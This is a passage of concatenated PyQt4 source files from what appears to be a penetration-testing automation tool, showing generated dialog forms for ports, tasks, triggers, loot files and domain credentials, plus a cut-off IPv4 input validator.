        spacerItem = QtGui.QSpacerItem(20, 73, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem)
        # Button row: an expanding spacer is added before OK and Cancel.
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem1)
        self.btnOK = QtGui.QPushButton(Dialog)
        self.btnOK.setObjectName(_fromUtf8("btnOK"))
        self.horizontalLayout_2.addWidget(self.btnOK)
        self.btnCancel = QtGui.QPushButton(Dialog)
        self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
        self.horizontalLayout_2.addWidget(self.btnCancel)
        self.verticalLayout.addLayout(self.horizontalLayout_2)

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Assign the window title and the text of the label and buttons."""
        Dialog.setWindowTitle(_translate("Dialog", "New Port", None))
        self.label.setText(_translate("Dialog", "Port Number", None))
        self.btnOK.setText(_translate("Dialog", "OK", None))
        self.btnCancel.setText(_translate("Dialog", "Cancel", None))
65 |
66 |
# Manual preview: when this module is run directly, show the bare dialog
# built by Ui_Dialog and exit with the event loop's return code.
if __name__ == "__main__":
    import sys
    app = QtGui.QApplication(sys.argv)
    Dialog = QtGui.QDialog()
    ui = Ui_Dialog()
    ui.setupUi(Dialog)
    Dialog.show()
    sys.exit(app.exec_())
75 |
76 |
--------------------------------------------------------------------------------
/inputwindows/Ui_confirmation.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/confirmation.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
# Compatibility shim: use QString.fromUtf8 when QtCore exposes QString,
# otherwise fall back to returning the string unchanged.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        """Return *s* unchanged (fallback when QtCore has no QString)."""
        return s

# Compatibility shim: pass the UnicodeUTF8 encoding to translate() when
# QApplication defines it, otherwise call translate() without an encoding.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        """Translate *text* in *context*, passing the UnicodeUTF8 encoding."""
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        """Translate *text* in *context* without an explicit encoding."""
        return QtGui.QApplication.translate(context, text, disambig)
24 |
class Ui_Dialog(object):
    """Generated form for the modal "Confirmation" dialog.

    Holds a fixed-size image label, a message label and Yes/No buttons.
    The file header states it is produced by the PyQt4 UI code generator from
    confirmation.ui, so lasting changes belong in that .ui file.
    """
    def setupUi(self, Dialog):
        """Create the widgets and layouts on *Dialog* and set their texts."""
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(485, 275)
        Dialog.setSizeGripEnabled(True)
        Dialog.setModal(True)
        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        # Minimum and maximum size are both 221x221, which fixes the label's size.
        self.lblImage = QtGui.QLabel(Dialog)
        self.lblImage.setMinimumSize(QtCore.QSize(221, 221))
        self.lblImage.setMaximumSize(QtCore.QSize(221, 221))
        self.lblImage.setObjectName(_fromUtf8("lblImage"))
        self.horizontalLayout.addWidget(self.lblImage)
        self.label_2 = QtGui.QLabel(Dialog)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.horizontalLayout.addWidget(self.label_2)
        # The image/message row spans both grid columns; Yes and No sit below it.
        self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 2)
        self.btnYes = QtGui.QPushButton(Dialog)
        self.btnYes.setObjectName(_fromUtf8("btnYes"))
        self.gridLayout.addWidget(self.btnYes, 1, 0, 1, 1)
        self.btnNo = QtGui.QPushButton(Dialog)
        self.btnNo.setObjectName(_fromUtf8("btnNo"))
        self.gridLayout.addWidget(self.btnNo, 1, 1, 1, 1)

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Assign the window title and the default label and button texts."""
        Dialog.setWindowTitle(_translate("Dialog", "Confirmation", None))
        self.lblImage.setText(_translate("Dialog", "?", None))
        self.label_2.setText(_translate("Dialog", "Are you sure?", None))
        self.btnYes.setText(_translate("Dialog", "Yes", None))
        self.btnNo.setText(_translate("Dialog", "No", None))
60 |
61 |
if __name__ == "__main__":
    # Standalone preview of the generated form; nothing here runs on import.
    import sys

    application = QtGui.QApplication(sys.argv)
    preview_dialog = QtGui.QDialog()
    form = Ui_Dialog()
    form.setupUi(preview_dialog)
    preview_dialog.show()
    exit_code = application.exec_()
    sys.exit(exit_code)
70 |
71 |
--------------------------------------------------------------------------------
/inputwindows/Ui_newtask.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/newtask.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
# Compatibility shim: use QString.fromUtf8 where the binding exposes it.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # The attribute lookup failed, so strings are passed through unchanged.
    def _fromUtf8(s):
        return s

# Same idea for translate(): the explicit encoding argument is only passed
# when QApplication.UnicodeUTF8 exists.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
24 |
class Ui_Dialog(object):
    """Generated layout for the "New Task" dialog.

    The file header states it was produced by the PyQt4 UI code generator from
    newtask.ui and that manual changes are lost on regeneration, so changes
    belong in the .ui file.
    """

    def setupUi(self, Dialog):
        """Create one labelled row per task field plus the Save/Cancel buttons.

        Every row label is 110 px wide; 16777215 is Qt's QWIDGETSIZE_MAX, so
        the label height is left unconstrained.
        """
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(414, 389)
        Dialog.setSizeGripEnabled(True)
        self.verticalLayout_2 = QtGui.QVBoxLayout(Dialog)
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        self.verticalLayout = QtGui.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        # Row: category combo box (filled at runtime, empty here).
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.label = QtGui.QLabel(Dialog)
        self.label.setMinimumSize(QtCore.QSize(110, 0))
        self.label.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout.addWidget(self.label)
        self.cmbCategory = QtGui.QComboBox(Dialog)
        self.cmbCategory.setObjectName(_fromUtf8("cmbCategory"))
        self.horizontalLayout.addWidget(self.cmbCategory)
        self.verticalLayout.addLayout(self.horizontalLayout)
        # Row: task name.
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.label_2 = QtGui.QLabel(Dialog)
        self.label_2.setMinimumSize(QtCore.QSize(110, 0))
        self.label_2.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.horizontalLayout_2.addWidget(self.label_2)
        self.txtName = QtGui.QLineEdit(Dialog)
        self.txtName.setObjectName(_fromUtf8("txtName"))
        self.horizontalLayout_2.addWidget(self.txtName)
        self.verticalLayout.addLayout(self.horizontalLayout_2)
        # Row: multi-line description.
        self.horizontalLayout_3 = QtGui.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        self.label_3 = QtGui.QLabel(Dialog)
        self.label_3.setMinimumSize(QtCore.QSize(110, 0))
        self.label_3.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.horizontalLayout_3.addWidget(self.label_3)
        self.txtDescription = QtGui.QTextEdit(Dialog)
        self.txtDescription.setObjectName(_fromUtf8("txtDescription"))
        self.horizontalLayout_3.addWidget(self.txtDescription)
        self.verticalLayout.addLayout(self.horizontalLayout_3)
        # Row: file name of the task.
        self.horizontalLayout_4 = QtGui.QHBoxLayout()
        self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
        self.label_4 = QtGui.QLabel(Dialog)
        self.label_4.setMinimumSize(QtCore.QSize(110, 0))
        self.label_4.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.horizontalLayout_4.addWidget(self.label_4)
        self.txtFileName = QtGui.QLineEdit(Dialog)
        self.txtFileName.setObjectName(_fromUtf8("txtFileName"))
        self.horizontalLayout_4.addWidget(self.txtFileName)
        self.verticalLayout.addLayout(self.horizontalLayout_4)
        # Row: "Uses Metasploit" check box (the caption lives in label_5).
        self.horizontalLayout_5 = QtGui.QHBoxLayout()
        self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
        self.label_5 = QtGui.QLabel(Dialog)
        self.label_5.setMinimumSize(QtCore.QSize(110, 0))
        self.label_5.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.horizontalLayout_5.addWidget(self.label_5)
        self.cbxUsesMetasploit = QtGui.QCheckBox(Dialog)
        self.cbxUsesMetasploit.setText(_fromUtf8(""))
        self.cbxUsesMetasploit.setObjectName(_fromUtf8("cbxUsesMetasploit"))
        self.horizontalLayout_5.addWidget(self.cbxUsesMetasploit)
        self.verticalLayout.addLayout(self.horizontalLayout_5)
        # Row: "Is Recursive" check box.
        self.horizontalLayout_8 = QtGui.QHBoxLayout()
        self.horizontalLayout_8.setObjectName(_fromUtf8("horizontalLayout_8"))
        self.label_7 = QtGui.QLabel(Dialog)
        self.label_7.setMinimumSize(QtCore.QSize(110, 0))
        self.label_7.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_7.setObjectName(_fromUtf8("label_7"))
        self.horizontalLayout_8.addWidget(self.label_7)
        self.cbxIsRecursive = QtGui.QCheckBox(Dialog)
        self.cbxIsRecursive.setText(_fromUtf8(""))
        self.cbxIsRecursive.setObjectName(_fromUtf8("cbxIsRecursive"))
        self.horizontalLayout_8.addWidget(self.cbxIsRecursive)
        self.verticalLayout.addLayout(self.horizontalLayout_8)
        # Row: "Enabled" check box; no setChecked() call is made on it here.
        self.horizontalLayout_6 = QtGui.QHBoxLayout()
        self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
        self.label_6 = QtGui.QLabel(Dialog)
        self.label_6.setMinimumSize(QtCore.QSize(110, 0))
        self.label_6.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_6.setObjectName(_fromUtf8("label_6"))
        self.horizontalLayout_6.addWidget(self.label_6)
        self.cbxEnabled = QtGui.QCheckBox(Dialog)
        self.cbxEnabled.setText(_fromUtf8(""))
        self.cbxEnabled.setObjectName(_fromUtf8("cbxEnabled"))
        self.horizontalLayout_6.addWidget(self.cbxEnabled)
        self.verticalLayout.addLayout(self.horizontalLayout_6)
        # Expanding spacer keeps the rows at the top when the dialog grows.
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem)
        self.verticalLayout_2.addLayout(self.verticalLayout)
        # Button row.
        self.horizontalLayout_7 = QtGui.QHBoxLayout()
        self.horizontalLayout_7.setObjectName(_fromUtf8("horizontalLayout_7"))
        self.btnSave = QtGui.QPushButton(Dialog)
        self.btnSave.setObjectName(_fromUtf8("btnSave"))
        self.horizontalLayout_7.addWidget(self.btnSave)
        self.btnCancel = QtGui.QPushButton(Dialog)
        self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
        self.horizontalLayout_7.addWidget(self.btnCancel)
        self.verticalLayout_2.addLayout(self.horizontalLayout_7)

        self.retranslateUi(Dialog)
        # Auto-connects signals to on_<objectName>_<signal> slots on Dialog,
        # so the object names set above are part of the wiring.
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Set the window title and all visible captions through _translate."""
        Dialog.setWindowTitle(_translate("Dialog", "New Task", None))
        self.label.setText(_translate("Dialog", "Category", None))
        self.label_2.setText(_translate("Dialog", "Name", None))
        self.label_3.setText(_translate("Dialog", "Description", None))
        self.label_4.setText(_translate("Dialog", "File Name", None))
        self.label_5.setText(_translate("Dialog", "Uses Metasploit", None))
        self.label_7.setText(_translate("Dialog", "Is Recursive", None))
        self.label_6.setText(_translate("Dialog", "Enabled", None))
        self.btnSave.setText(_translate("Dialog", "Save", None))
        self.btnCancel.setText(_translate("Dialog", "Cancel", None))
141 |
142 |
if __name__ == "__main__":
    # Standalone preview of the generated form; nothing here runs on import.
    import sys

    application = QtGui.QApplication(sys.argv)
    preview_dialog = QtGui.QDialog()
    form = Ui_Dialog()
    form.setupUi(preview_dialog)
    preview_dialog.show()
    exit_code = application.exec_()
    sys.exit(exit_code)
151 |
152 |
--------------------------------------------------------------------------------
/inputwindows/Ui_newtrigger.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/newtrigger.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
# Compatibility shim: use QString.fromUtf8 where the binding exposes it.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # The attribute lookup failed, so strings are passed through unchanged.
    def _fromUtf8(s):
        return s

# Same idea for translate(): the explicit encoding argument is only passed
# when QApplication.UnicodeUTF8 exists.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
24 |
class Ui_Dialog(object):
    """Generated layout for the trigger/event dialog (window title "New Event").

    The file header states it was produced by the PyQt4 UI code generator from
    newtrigger.ui and that manual changes are lost on regeneration, so changes
    belong in the .ui file.
    """

    def setupUi(self, Dialog):
        """Create one labelled row per trigger field plus the Save/Cancel buttons.

        Every row label is 110 px wide; 16777215 is Qt's QWIDGETSIZE_MAX, so
        the label height is left unconstrained.
        """
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(385, 260)
        Dialog.setSizeGripEnabled(True)
        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.verticalLayout = QtGui.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        # Row: trigger combo box (filled at runtime, empty here).
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.label = QtGui.QLabel(Dialog)
        self.label.setMinimumSize(QtCore.QSize(110, 0))
        self.label.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout.addWidget(self.label)
        self.cmbTriggers = QtGui.QComboBox(Dialog)
        self.cmbTriggers.setObjectName(_fromUtf8("cmbTriggers"))
        self.horizontalLayout.addWidget(self.cmbTriggers)
        self.verticalLayout.addLayout(self.horizontalLayout)
        # Row: free-text value mask.
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.label_2 = QtGui.QLabel(Dialog)
        self.label_2.setMinimumSize(QtCore.QSize(110, 0))
        self.label_2.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.horizontalLayout_2.addWidget(self.label_2)
        self.txtValueMask = QtGui.QLineEdit(Dialog)
        self.txtValueMask.setObjectName(_fromUtf8("txtValueMask"))
        self.horizontalLayout_2.addWidget(self.txtValueMask)
        self.verticalLayout.addLayout(self.horizontalLayout_2)
        # Row: task category combo box.
        self.horizontalLayout_3 = QtGui.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        self.label_3 = QtGui.QLabel(Dialog)
        self.label_3.setMinimumSize(QtCore.QSize(110, 0))
        self.label_3.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.horizontalLayout_3.addWidget(self.label_3)
        self.cmbCategory = QtGui.QComboBox(Dialog)
        self.cmbCategory.setObjectName(_fromUtf8("cmbCategory"))
        self.horizontalLayout_3.addWidget(self.cmbCategory)
        self.verticalLayout.addLayout(self.horizontalLayout_3)
        # Row: task name combo box.
        self.horizontalLayout_4 = QtGui.QHBoxLayout()
        self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
        self.label_4 = QtGui.QLabel(Dialog)
        self.label_4.setMinimumSize(QtCore.QSize(110, 0))
        self.label_4.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.horizontalLayout_4.addWidget(self.label_4)
        self.cmbTasks = QtGui.QComboBox(Dialog)
        self.cmbTasks.setObjectName(_fromUtf8("cmbTasks"))
        self.horizontalLayout_4.addWidget(self.cmbTasks)
        self.verticalLayout.addLayout(self.horizontalLayout_4)
        # Row: "Enabled" check box, ticked by default.
        self.horizontalLayout_5 = QtGui.QHBoxLayout()
        self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
        self.label_5 = QtGui.QLabel(Dialog)
        self.label_5.setMinimumSize(QtCore.QSize(110, 0))
        self.label_5.setMaximumSize(QtCore.QSize(110, 16777215))
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.horizontalLayout_5.addWidget(self.label_5)
        self.cbxEnabled = QtGui.QCheckBox(Dialog)
        self.cbxEnabled.setText(_fromUtf8(""))
        self.cbxEnabled.setChecked(True)
        self.cbxEnabled.setObjectName(_fromUtf8("cbxEnabled"))
        self.horizontalLayout_5.addWidget(self.cbxEnabled)
        self.verticalLayout.addLayout(self.horizontalLayout_5)
        # Expanding spacer keeps the rows at the top when the dialog grows.
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem)
        self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
        # Button row.
        self.horizontalLayout_6 = QtGui.QHBoxLayout()
        self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
        self.btnSave = QtGui.QPushButton(Dialog)
        self.btnSave.setObjectName(_fromUtf8("btnSave"))
        self.horizontalLayout_6.addWidget(self.btnSave)
        self.btnCancel = QtGui.QPushButton(Dialog)
        self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
        self.horizontalLayout_6.addWidget(self.btnCancel)
        self.gridLayout.addLayout(self.horizontalLayout_6, 1, 0, 1, 1)

        self.retranslateUi(Dialog)
        # Auto-connects signals to on_<objectName>_<signal> slots on Dialog,
        # so the object names set above are part of the wiring.
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Set the window title and all visible captions through _translate."""
        Dialog.setWindowTitle(_translate("Dialog", "New Event", None))
        self.label.setText(_translate("Dialog", "Trigger", None))
        self.label_2.setText(_translate("Dialog", "Value Mask", None))
        self.label_3.setText(_translate("Dialog", "Task Category", None))
        self.label_4.setText(_translate("Dialog", "Task Name", None))
        self.label_5.setText(_translate("Dialog", "Enabled", None))
        self.btnSave.setText(_translate("Dialog", "Save", None))
        self.btnCancel.setText(_translate("Dialog", "Cancel", None))
116 |
117 |
if __name__ == "__main__":
    # Standalone preview of the generated form; nothing here runs on import.
    import sys

    application = QtGui.QApplication(sys.argv)
    preview_dialog = QtGui.QDialog()
    form = Ui_Dialog()
    form.setupUi(preview_dialog)
    preview_dialog.show()
    exit_code = application.exec_()
    sys.exit(exit_code)
126 |
127 |
--------------------------------------------------------------------------------
/inputwindows/Ui_textinput.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/root/Projects/autoDANE/inputwindows/textinput.ui'
4 | #
5 | # Created: Mon Jan 18 21:41:42 2016
6 | # by: PyQt4 UI code generator 4.11.2
7 | #
8 | # WARNING! All changes made in this file will be lost!
9 |
10 | from PyQt4 import QtCore, QtGui
11 |
# Compatibility shim: use QString.fromUtf8 where the binding exposes it.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # The attribute lookup failed, so strings are passed through unchanged.
    def _fromUtf8(s):
        return s

# Same idea for translate(): the explicit encoding argument is only passed
# when QApplication.UnicodeUTF8 exists.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
25 |
class Ui_Dialog(object):
    """Generated layout for the two-field text input dialog (Domain, Loot File).

    The file header states it was produced by the PyQt4 UI code generator from
    textinput.ui and that manual changes are lost on regeneration, so changes
    belong in the .ui file.
    """

    def setupUi(self, Dialog):
        """Create the Domain and Loot File rows and the OK/Cancel buttons on *Dialog*."""
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(423, 172)
        Dialog.setSizeGripEnabled(True)
        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.verticalLayout_2 = QtGui.QVBoxLayout()
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        # Row: domain (label at least 75 px wide).
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.label = QtGui.QLabel(Dialog)
        self.label.setMinimumSize(QtCore.QSize(75, 0))
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout_2.addWidget(self.label)
        self.txtDomain = QtGui.QLineEdit(Dialog)
        self.txtDomain.setObjectName(_fromUtf8("txtDomain"))
        self.horizontalLayout_2.addWidget(self.txtDomain)
        self.verticalLayout_2.addLayout(self.horizontalLayout_2)
        # Row: loot file name, a plain line edit with no constraint set here.
        self.horizontalLayout_3 = QtGui.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        self.label_2 = QtGui.QLabel(Dialog)
        self.label_2.setMinimumSize(QtCore.QSize(75, 0))
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.horizontalLayout_3.addWidget(self.label_2)
        self.txtLootFileName = QtGui.QLineEdit(Dialog)
        self.txtLootFileName.setObjectName(_fromUtf8("txtLootFileName"))
        self.horizontalLayout_3.addWidget(self.txtLootFileName)
        self.verticalLayout_2.addLayout(self.horizontalLayout_3)
        # Vertical spacer pushes the button row to the bottom.
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout_2.addItem(spacerItem)
        # Button row; the leading horizontal spacer right-aligns OK and Cancel.
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem1)
        self.btnOk = QtGui.QPushButton(Dialog)
        self.btnOk.setObjectName(_fromUtf8("btnOk"))
        self.horizontalLayout.addWidget(self.btnOk)
        self.btnCancel = QtGui.QPushButton(Dialog)
        self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
        self.horizontalLayout.addWidget(self.btnCancel)
        self.verticalLayout_2.addLayout(self.horizontalLayout)
        self.gridLayout.addLayout(self.verticalLayout_2, 0, 0, 1, 1)

        self.retranslateUi(Dialog)
        # Auto-connects signals to on_<objectName>_<signal> slots on Dialog,
        # so the object names set above are part of the wiring.
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Set the window title and all visible captions through _translate."""
        Dialog.setWindowTitle(_translate("Dialog", "Dialog", None))
        self.label.setText(_translate("Dialog", "Domain", None))
        self.label_2.setText(_translate("Dialog", "Loot File", None))
        self.btnOk.setText(_translate("Dialog", "OK", None))
        self.btnCancel.setText(_translate("Dialog", "Cancel", None))
79 |
80 |
if __name__ == "__main__":
    # Standalone preview of the generated form; nothing here runs on import.
    import sys

    application = QtGui.QApplication(sys.argv)
    preview_dialog = QtGui.QDialog()
    form = Ui_Dialog()
    form.setupUi(preview_dialog)
    preview_dialog.show()
    exit_code = application.exec_()
    sys.exit(exit_code)
89 |
90 |
--------------------------------------------------------------------------------
/inputwindows/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/inputwindows/__init__.py
--------------------------------------------------------------------------------
/inputwindows/adddomaincreds.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_adddomaincreds import Ui_Dialog
5 |
class wndAddDomainCreds(QDialog, Ui_Dialog):
    """Dialog for entering a domain credential.

    Only the domain and the username are mandatory. The password and hash
    fields listed in adddomaincreds.ui are not checked by this class.

    NOTE(review): whatever reads those fields after accept() is handling
    secrets; how they are stored or logged is not visible from this file.
    """

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        self.setupUi(self)

    @pyqtSignature("")
    def on_btnOK_clicked(self):
        """Accept the dialog when domain and username are filled in, else inform the user."""
        domain_given = self.txtDomain.text() != ""
        if domain_given and self.txtUsername.text():
            self.accept()
            return
        QMessageBox.information(self, "Information", "You need to provide at least a domain and username")

    @pyqtSignature("")
    def on_btnCancel_clicked(self):
        """Dismiss the dialog without accepting the input."""
        self.reject()
21 |
--------------------------------------------------------------------------------
/inputwindows/adddomaincreds.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 668
10 | 398
11 |
12 |
13 |
14 | Add Domain Creds
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 |
28 | 100
29 | 0
30 |
31 |
32 |
33 | Domain
34 |
35 |
36 |
37 | -
38 |
39 |
40 |
41 |
42 | -
43 |
44 |
-
45 |
46 |
47 |
48 | 100
49 | 0
50 |
51 |
52 |
53 | Username
54 |
55 |
56 |
57 | -
58 |
59 |
60 |
61 |
62 | -
63 |
64 |
-
65 |
66 |
67 |
68 | 100
69 | 0
70 |
71 |
72 |
73 | Password
74 |
75 |
76 |
77 | -
78 |
79 |
80 |
81 |
82 | -
83 |
84 |
-
85 |
86 |
87 |
88 | 100
89 | 0
90 |
91 |
92 |
93 | LM Hash
94 |
95 |
96 |
97 | -
98 |
99 |
100 |
101 |
102 | -
103 |
104 |
-
105 |
106 |
107 |
108 | 100
109 | 0
110 |
111 |
112 |
113 | NTLM Hash
114 |
115 |
116 |
117 | -
118 |
119 |
120 |
121 |
122 | -
123 |
124 |
125 | Verified. Check this if you're sure the password is correct
126 |
127 |
128 | false
129 |
130 |
131 |
132 | -
133 |
134 |
135 | Qt::Vertical
136 |
137 |
138 |
139 | 20
140 | 40
141 |
142 |
143 |
144 |
145 | -
146 |
147 |
-
148 |
149 |
150 | Qt::Horizontal
151 |
152 |
153 |
154 | 40
155 | 20
156 |
157 |
158 |
159 |
160 | -
161 |
162 |
163 | OK
164 |
165 |
166 |
167 | -
168 |
169 |
170 | Cancel
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
--------------------------------------------------------------------------------
/inputwindows/addhost.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_addhost import Ui_Dialog
5 |
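class wndAddHost(QDialog, Ui_Dialog):
    """Dialog that asks for one IPv4 address and validates it before accepting."""

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        self.setupUi(self)

    def valid(self):
        """Return True when the IP address field holds a dotted-quad IPv4 address.

        Each of the four parts must be a plain decimal number in 0..255. The
        earlier check only compared the *sum* of the parts against 255 * 4, so
        inputs such as 999.0.0.1 or -1.0.0.0 passed validation and were handed
        on as hosts. 255.255.255.255 stays rejected, as it was before.
        Leading zeros are still accepted and read as decimal.
        """
        try:
            text = str(self.txtIPAddress.text())
        except UnicodeError:
            # Non-ASCII input cannot be an IPv4 literal.
            return False

        parts = text.split(".")
        if len(parts) != 4:
            return False

        octets = []
        for part in parts:
            # isdigit() rejects signs, blanks and empty parts before int() sees them.
            if not part.isdigit():
                return False
            try:
                value = int(part)
            except ValueError:
                return False
            if value > 255:
                return False
            octets.append(value)

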